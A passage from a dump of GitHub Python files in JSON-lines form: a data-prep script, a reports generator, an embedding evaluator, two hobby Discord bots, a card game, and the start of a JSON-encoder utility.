triggered(\"Trash build up is too much. Help service hotline activated!\")\r\n \r\n cv2.imshow('gray', gray)\r\n k = cv2.waitKey(30) & 0xff\r\n if k == 27:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"ianlimle/IoT-Home-Care-System","sub_path":"Rpi_control_cam.py","file_name":"Rpi_control_cam.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36725368952","text":"import pandas as pd\nimport numpy as np\nimport string\nimport os\nimport json\nimport gc\nfrom sklearn.preprocessing import LabelEncoder\ngc.enable()\n\ndataPath='../../../data/avito-demand-prediction'\n\nUSE_HDF5_COMPRESSION_ARG = {\n 'format': 'table', \n 'complib': 'blosc:zstd', \n 'complevel': 9\n}\n\n# Remove any existing hdf5 storage file since it does not support clean overwrite\nfor f in os.listdir(f'{dataPath}'): \n if '.h5' in f and 'active' not in f:\n os.remove(f'{dataPath}/{f}')\n print(f'{dataPath}/{f} removed')\n\nbasicDataStore = pd.HDFStore(f'{dataPath}/basicData.h5', **USE_HDF5_COMPRESSION_ARG)\ntextDataStore = pd.HDFStore(f'{dataPath}/textData.h5', **USE_HDF5_COMPRESSION_ARG)\nimageDataStore = pd.HDFStore(f'{dataPath}/imageData.h5', **USE_HDF5_COMPRESSION_ARG)\n\n## Load csv.zip data\ntrain = pd.read_csv(os.path.join(dataPath, 'train.csv.zip'), compression='zip')\nprint('train.csv loaded')\ntest = pd.read_csv(os.path.join(dataPath, 'test.csv.zip'), compression='zip')\nprint('test.csv loaded')\n\n## Apply label encoding\nmapping_folder = 'Label_encoding_basic'\nif not os.path.exists(mapping_folder):\n os.mkdir(mapping_folder)\n\ndef compressMainTable(df):\n for col in df:\n if df[col].dtype=='object' and df[col].nunique() < 3000 and col != 'activation_date':\n print(f'encoding {col}...')\n le = LabelEncoder()\n le.fit(df[col].astype(str))\n le_mapping = dict(zip(le.classes_, map(int, le.transform(le.classes_))))\n\n with open(os.path.join(mapping_folder, col+'.json'), 'w') as f:\n json.dump(le_mapping, f, indent=4, ensure_ascii=False)\n\n df[col] = le.fit_transform(df[col].astype(str)).astype(np.int16)\n\n df.price = df.price.fillna(-1).astype(np.int64)\n df.item_seq_number = df.item_seq_number.astype(np.int32)\n df.activation_date = pd.to_datetime(df.activation_date)\n return df\n\ntmpCat = pd.concat([train,test], sort=False)\ntmpCat = compressMainTable(tmpCat)\ntrain = tmpCat.iloc[:train.shape[0],:]\ntest = tmpCat.iloc[train.shape[0]:,]\ntarget = train.deal_probability\ntrain.drop('deal_probability', axis=1, inplace=True)\ntest.drop('deal_probability', axis=1, inplace=True)\n\n## Separate and drop advanced features into a different data file\ntextFeatures = ['title', 'description']\nimageFeatures = ['image', 'image_top_1']\n\ntextDataStore['trainRaw'] = train[['item_id', 'user_id'] + textFeatures]\nimageDataStore['trainRaw'] = train[['item_id', 'user_id'] + imageFeatures]\ntextDataStore['testRaw'] = test[['item_id', 'user_id'] + textFeatures]\nimageDataStore['testRaw'] = test[['item_id', 'user_id'] + imageFeatures]\n\ntrain.drop(textFeatures+imageFeatures, axis=1, inplace=True)\ntest.drop(textFeatures+imageFeatures, axis=1, inplace=True)\n\nbasicDataStore['trainRaw'] = train\nbasicDataStore['testRaw'] = test\nbasicDataStore['trainTarget'] = target\n\n# Close HDF5\nbasicDataStore.close()\ntextDataStore.close()\nimageDataStore.close()\n\n# Clean up\ndel tmpCat\ngc.collect();\n","repo_name":"LowPass-DataScience/avito-demand-prediction-chanllege","sub_path":"avito-demand-prediction-challenge/python_codes/prepare_HDF5.py","file_name":"prepare_HDF5.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1207426613","text":"import os\nfrom model import *\nimport pandas as pd\nfrom peewee import fn\nfrom datetime import datetime\nfrom database import DatabaseConnections\n\ndb = DatabaseConnections()\nengine = db.sqlalchemy_connection()\n\nyear, month, day = str(datetime.today().date()).split('-')\nmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun','Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\nclass Reports:\n\n def __init__(self, institution, retailer, path):\n self.institution = institution\n self.retailer = retailer\n self.today = datetime.now().strftime(\"%y%m%d\") # today's date format YYMMDD\n self.path = path # './CompensationReports/RetailerReports/'\n\n def csvReport(self, table_name, report_name):\n try:\n cols = table_name._meta.sorted_field_names\n data = table_name.select().dicts()\n data_frame = pd.DataFrame(data, columns=cols)\n file_name = \"{}_{}.csv\".format(report_name, self.today)\n data_frame.to_csv(self.path + file_name, index=False)\n print(\"{} Generated at {} \".format(report_name ,datetime.now().strftime(r'%d-%m-%Y %H:%M:%S')))\n except table_name.DoesNotExist:print('Error In Generating Report Of {}'.format(report_name))\n except Exception as e:print('Error In Generating Report Of {} - {}'.format(report_name, str(e)))\n\n\n\n def all_transactions_report(self):\n query = '''SELECT distinct(newiseretailer.CardAcceptorIdentification) FROM newiseretailer INNER JOIN retailercompansation\n ON retailercompansation.RetailerId = newiseretailer.CardAcceptorIdentification And retailercompansation.Channel = newiseretailer.ChannelType and retailercompansation.EntityId = newiseretailer.AcquiringInstitutionIdentification where (newiseretailer.ResponseCode = '00') and (retailercompansation.PendingDays = '0');'''\n cursor = myDB.execute_sql(query)\n\n data=[k for k in cursor]\n result = [k for k in data]\n retailer_list = [item for sublist in result for item in sublist]\n try:\n query = NewISERetailer.select(\n NewISERetailer.AcquiringInstitutionIdentification,NewISERetailer.CardAcceptorIdentification,\n NewISERetailer.CardAcceptorTerminalIdentification,NewISERetailer.MerchantTypeCode,NewISERetailer.MessageType,\n NewISERetailer.ResponseCode,NewISERetailer.ProcessingCode,NewISERetailer.LocalTransactionTime,\n NewISERetailer.LocalTransactionDate,NewISERetailer.SettlementDate,NewISERetailer.Track2Data,\n NewISERetailer.SystemsTraceAuditNumber,NewISERetailer.RetrievalReferenceNumber,NewISERetailer.CardAcceptorNameLocation,\n NewISERetailer.ChannelType,NewISERetailer.CardType,NewISERetailer.TransactionAmount,NewISERetailer.RetCardTypeCommision,\n NewISERetailer.RetMccCommision,NewISERetailer.RetBinCommision,NewISERetailer.RetTxnIdentifierCommision,\n NewISERetailer.Retailer,NewISERetailer.Acquirer,NewISERetailer.Issuer,NewISERetailer.TotalCommissions,\n NewISERetailer.Retefuente,NewISERetailer.Reteica,NewISERetailer.Cree,NewISERetailer.Reteiva,NewISERetailer.TotalTaxes,\n NewISERetailer.TotalDiscounts,NewISERetailer.FinalAmount\n ).where((NewISERetailer.ResponseCode == '00') & NewISERetailer.CardAcceptorIdentification.in_(tuple(retailer_list))).dicts()\n\n data_frame = pd.DataFrame(query, columns=['AcquiringInstitutionIdentification', 'CardAcceptorIdentification', 'CardAcceptorTerminalIdentification',\n 'MerchantTypeCode', 'MessageType', 'ResponseCode', 'ProcessingCode', 'LocalTransactionTime',\n 'LocalTransactionDate', 'SettlementDate', 'Track2Data', 'SystemsTraceAuditNumber', 'RetrievalReferenceNumber',\n 'CardAcceptorNameLocation', 'ChannelType', 'CardType', 'TransactionAmount', 'RetCardTypeCommision',\n 'RetMccCommision', 'RetBinCommision', 'RetTxnIdentifierCommision', 'Retailer', 'Acquirer', 'Issuer',\n 'TotalCommissions', 'Retefuente', 'Reteica', 'Cree', 'Reteiva', 'TotalTaxes', 'TotalDiscounts', 'FinalAmount'])\n\n for x, y in data_frame.groupby('AcquiringInstitutionIdentification'):\n for k, v in y.groupby('ChannelType'):\n file_name = \"{}_{}_TGR_Retailer_{}.csv\".format(x, k, self.today)\n v.to_csv(self.path + file_name, index=False)\n\n print(\"All Transactions Report With Liquidation Generated at {} \".format(datetime.now().strftime(r'%d-%m-%Y %H:%M:%S')))\n except NewISERetailer.DoesNotExist:print('Error In Generating Report Of All Transactions With Liquidation')\n\n except Exception as e:print('Error In Generating Report Of All Transactions With Liquidation - {}'.format(str(e)))\n\n\n def Compsation_table_backup(self):\n\n FNAME = f'Daily_Bk_{\"retailercompansation\"}_{year}{month}{day}.csv'\n REPORTS_PATH = f'CompensationReports/RetailerCompansationBackup/'\n\n dataFrame = pd.read_sql_table(\"retailercompansation\", con=engine).astype('str')\n dataFrame.to_csv(REPORTS_PATH+FNAME)\n\nif __name__ == '__main__':\n pass","repo_name":"AnkitaOmni/gh-first-action","sub_path":"reports_cc42.py","file_name":"reports_cc42.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19535295069","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport pandas as pd\n\n\n# In[5]:\n\n\nresults = dict()\noutput = dict()\ntasks = os.listdir('./tasks')\nword_embeddings = os.listdir('./word_vec')\ntasks.remove('.DS_Store')\n\nfor i in word_embeddings:\n print('evaluating', i)\n results = dict()\n for j in tasks:\n results[j] = os.popen('python3 evaluate_wordSim.py ./word_vec/{} ./tasks/{}'.format(i, j)).read().replace('\\n', '')\n print(results)\n output[i] = results\n\n\n# In[6]:\n\n\npd.DataFrame(output).T.to_csv('intrinsic_results.csv')\n\n","repo_name":"Institute-for-Artificial-Intelligence/Sparse-Interpretable-Word-Embeddings-For-Medical-Domain","sub_path":"eval/intrinsic/intrinsic_eva.py","file_name":"intrinsic_eva.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31884770447","text":"import discord\nimport time\nimport random\nimport os\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport configparser\n\n# Config environment\nconfig = configparser.ConfigParser()\nconfig.read('conf.ini')\n\n# Variables Tateti\ntablero = [[\"0\", \"1\", \"2\"], [\"3\", \"4\", \"5\"], [\"6\", \"7\", \"8\"]]\njug = [\"\", \"\"]\ntateti_iniciar = False\nturno_jug = 0\n\n# Discord Client\nclient = discord.Client()\n\n# -----------Eventos-----------\n@client.event\nasync def on_message(message):\n # Variables globales\n global tablero\n global tateti_iniciar\n global jug\n global turno_jug\n\n # Respuestas aleatorias\n respuesta = [\"Si\",\n \"No\",\n \"Tal vez\",\n \"Nunca\",\n \"Seguramente\",\n \"Nah\",\n \"100% Seguro\"]\n\n # Frases aleatorias\n frases = [\"Sos pelotudo\",\n \"Hola\",\n \"Aguante River\"]\n\n # El que escriba el comando no sea el mismo bot\n if(message.author == client.user):\n return\n #pass\n\n # Comando !hola\n if message.content == '!hola':\n msg = 'Buenos dias, {0.author.mention}'.format(message)\n await message.channel.send(msg)\n\n # Comando !hora\n if message.content == '!hora':\n msg = 'La hora es '+time.strftime(\"%H:%M:%S\").format(message)\n await message.channel.send(msg)\n\n # Comando !fecha\n if message.content == '!fecha':\n msg = 'La fecha es '+time.strftime(\"%d/%m/%y\").format(message)\n await message.channel.send(msg)\n\n # Comando !roll\n if message.content == '!roll':\n num = str(random.randrange(100))\n msg = (\n \"El usuario {0.author.mention} saco el numero: \" + num).format(message)\n await message.channel.send(msg)\n\n # Comando !purgar_chat\n if message.content == '!purgar_chat':\n msg = \"Purgando todo el chat en 5 segundos \\n\"\n await message.channel.send(msg)\n time.sleep(5)\n await message.channel.purge()\n\n # Comando !borrame_esto\n if message.content == \"!borrame_esto\":\n msg = \"Borrando esta mierda \\n \"\n await message.channel.delete()\n\n # Comando !help\n if message.content == '!help' or message.content == \"!\":\n msg = \"Commandos de Neo Bot: \\n\"\n msg += \"!hola --> Saludo \\n\"\n msg += \"!hora --> Hora del sistema \\n\"\n msg += \"!fecha --> Fecha del sistema \\n\"\n msg += \"!roll --> Tira los dados \\n\"\n msg += \"!help --> Ayuda del Bot \\n\"\n msg += \"!pregunta --> Preguntale algo al Bot \\n\"\n msg += \"!random --> El bot tira una frase random \\n\"\n msg += \"!ping --> Podes consultar el lag que tenes \\n\"\n msg += \"!purgar_chat --> (solo dev) Borra los ultimos mensajes del canal de chat donde se lanzo el comando\\n\"\n msg += \"!borrame_esto --> (solo dev) Borra el ultimo mensaje del canal donde se lanzo el comando\\n\"\n msg += \"!imagen --> Busca una imagen dado una palabra o frase en google, la imagen no tiene un tamaño considerable\\n\"\n msg += \"!iniciar_tateti --> Inicia una partida de tateti\\n\"\n msg += \"!tateti --> Juega la posicion indicada en el tateti\\n\"\n msg += \"!hablar --> (solo dev) El bot dice algo\\n\"\n await message.channel.send(msg)\n\n # Comando !ping\n if message.content == \"!ping\":\n msg = round(client.latency * 1000)\n await message.channel.send(\"Ping : \" + str(msg))\n\n # Comando \"!usuarios\"\n if message.content == \"!usuarios\":\n for u in message.guild.members:\n print(u.status)\n\n # Comando !random\n if message.content == \"!random\":\n await message.channel.send(random.choice(frases))\n\n # Comando !pregunta\n if message.content.startswith(\"!pregunta\"):\n preg = re.compile(r\"(!pregunta)\").sub(\"\", message.content,)\n await message.channel.send(preg+\"? \" + random.choice(respuesta))\n \n # Happy birthday\n if 'happy birthday' in message.content.lower() or 'feliz cumpleaños' in message.content.lower():\n await message.channel.send('Feliz cumpleaños!! 🎈🎉')\n\n # Busqueda de imagenes !imagen\n if message.content.startswith(\"!imagen\"):\n image_list = []\n palabra_imagen = re.compile(r\"(!imagen)\").sub(\"\", message.content,)\n url_google = \"https://www.google.com/search?q=\" + \\\n palabra_imagen + \"&source=lnms&tbm=isch\"\n print(\"Link de la busqueda:\" + url_google)\n res = requests.get(url_google).content\n soup = BeautifulSoup(res, 'html.parser')\n for link in soup.find_all(\"img\"):\n image_list.append(link.get(\"src\"))\n image_list = list(filter(None, image_list))\n image_list = list(filter(lambda a: \"http\" in a, image_list))\n e = discord.Embed()\n e.set_image(\n url=image_list[random.randrange(1 + (len(image_list) - 1))])\n await message.channel.send(embed=e)\n\n # El chat bot habla\n if message.content.startswith(\"!habla\"):\n mensaje_habla = re.sub(r\"!habla\",\"\", message.content)\n mensaje_habla = re.sub(r\"r \",\"\",mensaje_habla)\n await message.channel.send(mensaje_habla)\n\n # Tateti !tateti\n if message.content.startswith(\"!iniciar_tateti\"):\n if tateti_iniciar:\n msg = \"Ya hay una partida iniciada\"\n else:\n rival = \"\"\n if len([x.id for x in message.mentions]) == 1:\n for u in [x.id for x in message.mentions]:\n rival = u\n jug[0] = message.author.id\n jug[1] = rival\n if len([x.id for x in message.mentions]) > 1:\n msg = \"Solo se puede retar a un usuario\"\n elif len([x.id for x in message.mentions]) == 0:\n msg = \"No se nombro a ningun usuario para la partida\"\n elif rival not in [x.id for x in message.mentions]:\n msg = \"El rival no se encuentra en la lista de usuarios\"\n elif rival == message.author.id:\n msg = \"El rival no puede ser el mismo usuario\"\n else:\n tateti_iniciar = True\n msg = \"Se inicia una partida de tateti entre <@\" + str(message.author.id) + \"> y <@\" + str(rival) + \">\\n\"\n username1 = client.get_user(jug[0])\n username2 = client.get_user(jug[1])\n turno_jug = random.randrange(0,2)\n msg += \"Turno de <@\" + str(jug[turno_jug]) + \"> \"\n await message.channel.send(msg)\n \n if message.content.startswith(\"!tateti\") and tateti_iniciar:\n if jug[turno_jug] == message.author.id:\n pos = re.compile(r\"(!tateti)\").sub(\"\", message.content,)\n if tablero[(int(pos) // 3)][(int(pos) % 3)] == \"X\" or tablero[(int(pos) // 3)][(int(pos) % 3)] == \"O\":\n msg = \"La posicion ya esta ocupada por \" + tablero[(int(pos) // 3)][(int(pos) % 3)]\n else:\n if turno_jug == 0:\n tablero[(int(pos) // 3)][(int(pos) % 3)] = \"X\"\n turno_jug = 1\n else:\n tablero[(int(pos) // 3)][(int(pos) % 3)] = \"O\"\n turno_jug = 0\n msg = tablero[0][0] + \" | \" + tablero[0][1] + \" | \" + tablero[0][2] + \"\\n\" \\\n + \"----------\\n\" \\\n + tablero[1][0] + \" | \" + tablero[1][1] + \" | \" + tablero[1][2] + \"\\n\" \\\n + \"----------\\n\" \\\n + tablero[2][0] + \" | \" + tablero[2][1] + \" | \" + tablero[2][2]\n if tablero[0][0] == tablero[0][1] and tablero[0][0] == tablero[0][2] or \\\n tablero[1][0] == tablero[1][1] and tablero[1][0] == tablero[1][2] or \\\n tablero[2][0] == tablero[2][1] and tablero[2][0] == tablero[2][2] or \\\n tablero[0][0] == tablero[1][0] and tablero[0][0] == tablero[2][0] or \\\n tablero[0][1] == tablero[1][1] and tablero[0][1] == tablero[1][2] or \\\n tablero[0][2] == tablero[1][2] and tablero[0][2] == tablero[2][2] or \\\n tablero[0][0] == tablero[1][1] and tablero[0][0] == tablero[2][2] or \\\n tablero[2][0] == tablero[1][1] and tablero[2][0] == tablero[0][2]:\n msg += \"\\n El ganador fue <@\" + str(message.author.id) + \"> , se limpiara el tablero\"\n # Limpio el tablero a como estaba antes\n tablero = [[\"0\", \"1\", \"2\"], [\"3\", \"4\", \"5\"], [\"6\", \"7\", \"8\"]]\n tateti_iniciar = False\n else:\n cant = 0\n for i in range(0,3):\n for j in range(0,3):\n if tablero[i][j] == \"X\" or tablero[i][j] == \"O\":\n cant += 1\n if cant == 9:\n msg += \"\\n El juego termino en empate\"\n # Limpio el tablero a como estaba antes\n tablero = [[\"0\", \"1\", \"2\"], [\"3\", \"4\", \"5\"], [\"6\", \"7\", \"8\"]]\n tateti_iniciar = False\n else:\n msg += \"\\n Sigue el jugador <@\" + str(jug[turno_jug]) + \">\"\n else:\n msg = \"No es el turno del jugador <@\" + str(message.author.id) + \">\"\n await message.channel.send(msg)\n elif message.content.startswith(\"!tateti\") and not tateti_iniciar:\n msg = \"Aun no se ha iniciado una partida de tateti, iniciala con !iniciar_tateti\"\n await message.channel.send(msg)\n\n\n@client.event\nasync def on_message_delete(message):\n await message.channel.send(\"Un mensaje ha sido borrado\")\n\n\n@client.event\nasync def on_ready():\n print(\"Neo-Bot preparado\")\n print(\"Iniciado como {0.user}\".format(client))\n\n\n@client.event\nasync def on_member_join(member):\n # Envio de mensaje privado\n await member.create_dm()\n await member.dm_channel.send(f'Hola {member.name}, bienvenido a mi servidor de Discord!')\n# -----------Eventos-----------\n\n# Main\n\nclient.run(config['TOKEN']['secret_token'])\n","repo_name":"SantiMenendez19/neo_bot_discord","sub_path":"neo_bot.py","file_name":"neo_bot.py","file_ext":"py","file_size_in_byte":10103,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8172842774","text":"#Title: Hello World - cuhackit 10/17/2020\r\n#Authors: Team 15 (Plethora of Maniacs): Nathan, Darin, Alex, John\r\n#Project: MarketBot\r\n#Version: Beta 1.0\r\n\r\n#TO-DO: Add ability to add descriptions\r\n#TO-DO: Limit submissions/day on MarketBot; maybe add pictures eventually\r\n\r\n\r\n#import libraries: including discord API\r\nimport json\r\nimport discord\r\nfrom discord.ext import commands\r\nimport random\r\n\r\n#market description:\r\ndescription = \"A marketplace bot for Clemson\" \r\n#Set default bot intents\r\nintents = discord.Intents.default() \r\n\r\n#bot prefix: user enters '$' to enter in commands for marketBot\r\nbot = commands.Bot(command_prefix='$', description=description, intents=intents)\r\n\r\n#function: opens .json file for the marketBot to read from\r\ndef readListings():\r\n with open('listings.json', 'r') as f:\r\n return json.loads(f.read())\r\n \r\n#function: writes the user listing to the .json file\r\ndef writeListings(x):\r\n with open('listings.json', 'w') as f:\r\n f.write(json.dumps(x))\r\n\r\n#event: When the bot loads up, execute the following\r\n@bot.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(bot.user.name)\r\n print(bot.user.id)\r\n print('------')\r\n\r\n #Changes status to idle for bot when bot not in use. Also displays the Game state\r\n await bot.change_presence(status=discord.Status.online, activity=discord.Game('Use $market for help'))\r\n\r\n#$market command: Removes listings from the .json file\r\n@bot.command()\r\nasync def remove(ctx, num:int):\r\n listings = readListings()\r\n if num <= 0:\r\n await ctx.send(\"**ERROR:** Item number cannot be less than or equal to 0.\")\r\n return\r\n if listings[0][\"numberOfListings\"] < num:\r\n await ctx.send(\"**ERROR:** Item not recognized!\")\r\n return\r\n if (listings[num]['userid'] == ctx.author.id):\r\n listings.pop(num)\r\n listings[0][\"numberOfListings\"] = int(listings[0][\"numberOfListings\"]) - 1\r\n writeListings(listings)\r\n await ctx.send('Item has been removed!')\r\n else:\r\n await ctx.send('**ERROR:** You are not the user who made this listing.')\r\n\r\n#$market command: Prints the list of commands the user can input\r\n@bot.command()\r\nasync def market(ctx):\r\n output = \"\"\"```$sell ``` - Spaces split up the parameters, use underscores in the item name or contact if needed.\r\n\r\n ```$remove ``` - Remove one of your listings from the public list.\r\n\r\n ```$view ``` - View more information on an item. \r\n\r\n ```$viewAll``` - Lists all items that are currently being sold. \"\"\"\r\n embed = discord.Embed(title='List of Commands: :coin:',\r\n description=output, colour = discord.Colour.blue())\r\n embed.set_image(url='https://cdn.discordapp.com/avatars/767044968878440479/0ef76e39c69d1815a32d1697d7df070b.png')\r\n await ctx.send(embed=embed)\r\n\r\n#$market command: Lets user list their items to $market/.json file\r\n# $sell item_Name price contact\r\n@bot.command()\r\nasync def sell(ctx, item:str, price:str, contact:str):\r\n invalidChars = [\"*\", \"<\", \">\", \",\", \"\\\\\", \"!\"]\r\n for invalid in invalidChars:\r\n if invalid in item or invalid in price or invalid in contact:\r\n await ctx.send(\"**ERROR:** Please do not enter symbols.\")\r\n return\r\n listings = readListings()\r\n\r\n listings.append({ \"Listing\":item, \"Price\":price, \"Contact\":contact, \"userid\":ctx.author.id})\r\n listings[0][\"numberOfListings\"] = int(listings[0][\"numberOfListings\"]) + 1\r\n author = ctx.author\r\n \r\n #Wait on response from user to enter description\r\n def check(m):\r\n return m.author == author\r\n await ctx.send(\"Awesome! Please enter a brief description of your item.\")\r\n msg = await bot.wait_for('message', check=check)\r\n \r\n numOfListings = int(listings[0][\"numberOfListings\"])\r\n listings[numOfListings]['Description'] = msg.content\r\n\r\n writeListings(listings)\r\n embed = showListing(int(listings[0][\"numberOfListings\"]))\r\n await ctx.send(\"Listing added!\")\r\n await ctx.send(embed=embed)\r\n\r\n#function: returns the embed information\r\ndef showListing(num):\r\n listings = readListings()\r\n output = \"\"\r\n for key in listings[num]:\r\n if key != \"userid\":\r\n output += \"**\" + key + \"**: \" + str(listings[num][key]) + \"\\n\"\r\n embed = discord.Embed(title='Viewing Item #'+str(num)+' :eyes:',\r\n description=output, colour = discord.Colour.blue())\r\n return embed\r\n\r\n#function: print error message for user whenever invalid argument is passed\r\n@bot.event\r\nasync def on_command_error(ctx, error):\r\n if isinstance(error, commands.errors.BadArgument):\r\n await ctx.send(\"ERROR: Invalid argument. Please run **$market** for information on how to use MarketBot's commands.\")\r\n\r\n#Views the listing the user specifies\r\n@bot.command()\r\nasync def view(ctx, num:int):\r\n if num == 69420 or num == 42069:\r\n await ctx.send(\"haha funny number lol\")\r\n return\r\n if num <= 0:\r\n await ctx.send(\"**ERROR:** Item number cannot be less than or equal to 0.\")\r\n return\r\n embed = showListing(num)\r\n await ctx.send(embed=embed)\r\n\r\n#Prints all listings in the listings.json file and displays their listing & price\r\n@bot.command()\r\nasync def viewAll(ctx):\r\n listings = readListings() #Read file as string and parse as json\r\n numOfListings = listings[0][\"numberOfListings\"]\r\n output = \"\"\r\n for i in range(1,int(numOfListings)+1): #for loop: displays the listing + price for user\r\n listing = listings[i][\"Listing\"] \r\n price = listings[i][\"Price\"]\r\n output += str(i) + \") **\" + listing + \"**: \" + price + \"\\n\\n\"\r\n embed = discord.Embed(title='All Current Listings :fire:',\r\n description=output, colour = discord.Colour.blue())\r\n await ctx.send(embed=embed)\r\n\r\n#Unique bot token.\r\nbot.run('token')","repo_name":"OxxoCodes/MarketBot","sub_path":"marketbot.py","file_name":"marketbot.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5154052144","text":"import random #14/10 23.14\n\nclass Player:\n def __init__(self, name, total=0, played=False):\n self.name = name\n self.total = total\n self.played = played\n\nclass Question:\n def __init__(self, question, correct):\n self.question = question\n self.correct = correct\n\nclass Game:\n def begin(self, playerA, playerB):\n global totalGames\n while True:\n if totalGames == 2:\n print(\"GAME OVER!\")\n break\n if totalGames == 1 and playerA.played == 4:\n break\n if totalGames == 1 and playerB.played == 4:\n break\n if playerA.played == True:\n self.highOrLow(playerB)\n if playerB.played == True:\n self.highOrLow(playerA)\n\n def test(self,playerA, playerB):\n global testStatus\n while testStatus == True:\n global totalGames\n print(totalGames)\n if totalGames == 2:\n break\n qChoice = random.randint(1,len(qList))\n print(qList[qChoice-1].question)\n AAnswer = int(input(\"{}, please enter your estimation\".format(playerA.name)))\n BAnswer = int(input(\"{}, please enter your estimation\".format(playerB.name)))\n if qList[qChoice-1].correct > AAnswer:\n Adifference = qList[qChoice-1].correct - AAnswer\n elif qList[qChoice-1].correct < AAnswer:\n Adifference = AAnswer - qList[qChoice-1].correct\n else:\n Adifference = 0\n if qList[qChoice-1].correct > BAnswer:\n Bdifference = qList[qChoice-1].correct - BAnswer\n elif qList[qChoice-1].correct < BAnswer:\n Bdifference = BAnswer - qList[qChoice-1].correct\n else:\n Bdifference = 0\n print(qList[qChoice-1].correct)\n print(playerA.name,\" was \",Adifference,\" away!\")\n print(playerB.name,\" was \",Bdifference,\" away!\")\n if Adifference < Bdifference:\n print(playerA.name, \" wins!\")\n testStatus = False\n self.highOrLow(player1)\n elif Adifference > Bdifference:\n print(playerB.name, \" wins!\")\n testStatus = False\n self.highOrLow(player2)\n else:\n del qList[qChoice-1]\n \n def highOrLow(self, person):\n while cardSets != []:\n global totalGames\n totalGames += 1\n cards = cardSets.pop()\n print(\"The first card is \",cards[0])\n print(\"Welcome\", person.name)\n for j in range(1,length):\n print(\"\")\n print(\"Higher or lower? (TYPE 'h' or 'l'): \")\n choice = input()\n if choice == \"h\":\n print(\"The next card is: \", cards[j])\n print(\"\")\n if value.get(cards[j]) > value.get(cards[j-1]):\n print(\"Well done\")\n person.total+=1\n print(\"{}, has {} points\".format(person.name,person.total))\n else:\n print(\"Bad luck\")\n print(\"{}, finished with {} point(s)\".format(person.name,person.total))\n person.played = True\n return \"Game Over\"\n if person.total == 4:\n return \"Player wins\"\n elif choice == \"l\":\n print(\"The next card is: \", cards[j])\n print(\"\")\n if value.get(cards[j]) < value.get(cards[j-1]):\n print(\"Well done\")\n person.total+=1\n print(\"{}, has {} points\".format(person.name,person.total))\n else:\n print(\"Bad luck\")\n print(\"{}, finished with {} point(s)\".format(person.name,person.total))\n person.played = True\n return \"Game Over\"\n if person.total == 4:\n return \"Player wins\"\n\ndeck = list('23456789JQKA'*4)\ndeck.append(\"10\")\ndeck.append(\"10\")\ndeck.append(\"10\")\ndeck.append(\"10\")\nrandom.shuffle(deck)\nvalue = {'2':2, '3':3, '4':4, '5':5, '6':6, '7':7, '8':8,\n '9':9, '10':10, 'J':11, 'Q':12, 'K':13, 'A':14}\np1cards = [deck.pop() for _ in range(5)]\np2cards = [deck.pop() for _ in range(5)]\ncardSets = [p1cards,p2cards]\nlength = len(p1cards)\n\n#checks the set of cards for each player\nfor i in range(1,length):\n for j in range(1,length):#changed from j-1\n if p1cards[j] == p1cards[j-1]:\n p1cards.pop(j)\n newCard = deck.pop()\n p1cards.insert(j,newCard)\n#now for player 2's set\nfor i in range(1,length):\n for j in range(1,length):#changed from j-1\n if p2cards[j] == p2cards[j-1]:\n p2cards.pop(j)\n newCard = deck.pop()\n p2cards.insert(j,newCard)\n\nglobal totalGames\ntotalGames = 0\nglobal testStatus\ntestStatus = True\nQ1 = Question(\"How many fingers do we have?\", 8)\nQ2 = Question(\"How many tracks are there in Mario Kart 64?\",16)\nqList =[Q1,Q2]\nplayer1 = Player(\"James\",0,False)\nplayer2 = Player(\"Gavin\",0,False)\npList = [player1,player2]\ngame=Game()\ngame.test(player1,player2)\ngame.begin(player1,player2)\nprint(\"{}, had {}, and {}, had {}\".format(player1.name,player1.total,player2.name,player2.total))\n","repo_name":"riniguez91/year-13","sub_path":"high-or-low.py","file_name":"high-or-low.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28727665394","text":"\"\"\"Json Encoder utility\n\nTo invoke JSON encoder:\n\n```\n from relevanceai import json_encoder\n```\n\n\"\"\"\nimport math\nimport datetime\nimport dataclasses\nimport collections\nimport pandas as pd\n\nfrom ipaddress import IPv4Address, IPv4Interface, IPv4Network, IPv6Address, IPv6Interface, IPv6Network\n\nfrom enum import Enum\nfrom types import GeneratorType\nfrom uuid import UUID\nfrom collections import deque\nfrom pathlib import Path\nfrom pathlib import PurePath\nfrom types import GeneratorType\nfrom enum import Enum\nfrom typing import Any\n\n# Taken from pydanitc.json\nENCODERS_BY_TYPE = {\n bytes: lambda o: o.decode(),\n datetime.date: lambda o: o.isoformat(),\n datetime.datetime: lambda o: o.isoformat(),\n datetime.time: lambda o: o.isoformat(),\n datetime.timedelta: lambda td: td.total_seconds(),\n Enum: lambda o: o.value,\n frozenset: list,\n deque: list,\n GeneratorType: list,\n IPv4Address: str,\n IPv4Interface: str,\n IPv4Network: str,\n IPv6Address: str,\n IPv6Interface: str,\n IPv6Network: str,\n Path: str,\n set: list,\n UUID: str,\n}\n\n\ndef json_encoder(obj: Any, force_string: bool = False):\n \"\"\"Converts object so it is json serializable\n If you want to add your own mapping,\n customize it this way;\n\n Parameters\n ------------\n obj: Any\n The object to convert\n force_string: bool\n If True, forces the object to a string representation. Used mainly for\n analytics tracking.\n\n Example\n --------\n\n YOu can use our JSON encoder easily.\n >>> documents = [{\"value\": np.nan}]\n >>> client.json_encoder(documents)\n\n If you want to use FastAPI's json encoder, do this:\n >>> from fastapi import jsonable_encoder\n >>> 